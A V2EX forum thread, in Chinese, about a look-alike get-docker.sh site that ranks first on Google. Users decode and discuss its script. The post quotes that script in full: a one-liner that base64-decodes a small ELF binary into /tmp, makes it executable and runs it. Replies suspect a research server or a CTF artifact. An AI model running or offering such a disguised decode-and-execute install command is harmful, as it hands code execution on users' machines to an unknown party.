V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
loveshuyuan
V2EX  ›  问与答

谷歌搜索 get-docker.sh 第一个结果并不是 docker 官方的,貌似会执行恶意代码

  •  
  •   loveshuyuan · 100 天前 · 1359 次点击
    这是一个创建于 100 天前的主题,其中的信息可能已经有所发展或是发生改变。

    网址是 http://get-docker.sh,打开后跳转到 http://blin.gg/get-docker.sh,返回以下代码:

    #!/bin/bash
    base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==> /tmp/out; chmod +x /tmp/out; /tmp/out
    

    有谁知道这是要做什么?

    10 条回复    2024-09-11 22:55:03 +08:00
    bbsingao
        1
    bbsingao  
       100 天前
    base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==
    ELF���DZH��0�>����<�8H��
    H��
    H��7��
    竟然是个二进制,
    swulling
        2
    swulling  
       100 天前
    为啥会想到搜索 get-docker.sh ?不应该搜索 Docker installation script 么。
    Tink
        3
    Tink  
       100 天前
    是个二进制
    ELF���DZH��0�>���<�8H��
    H��
    H��7��%
    hingle
        4
    hingle  
       99 天前
    这么短的二进制,执行了什么操作,有没有懂的?
    woyao
        5
    woyao  
       99 天前
    从域名存活历史来看,有好几年了。
    域名根目录下还有一个文件 dominion.elf
    但是看了一下吧,应该是 Flare-On 2020: break

    get-docker.sh 似乎不完整……
    直接访问根域名吧,提示 !!! This is a research server !!!
    body007
        6
    body007  
       99 天前


    这个有问题的恶意代码,尽然有很多国内文章里面用到了🤣🤣🤣
    body007
        7
    body007  
       99 天前
    @body007 不好意思,点进去看不是用的这个问题网站下载,而是执行脚本名字和网站一样。
    a33291
        8
    a33291  
       99 天前
    mei'kan'dao 没看到什么有价值的操作
    zwzwzwzwzxt
        9
    zwzwzwzwzxt  
       99 天前
    为啥我这解析出来的除了前四个 Magic Number 外貌也不是有效的 ELF 文件啊
    nagisaushio
        10
    nagisaushio  
       99 天前
    跑起来直接 segfault 了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5172 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 28ms · UTC 09:00 · PVG 17:00 · LAX 01:00 · JFK 04:00
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.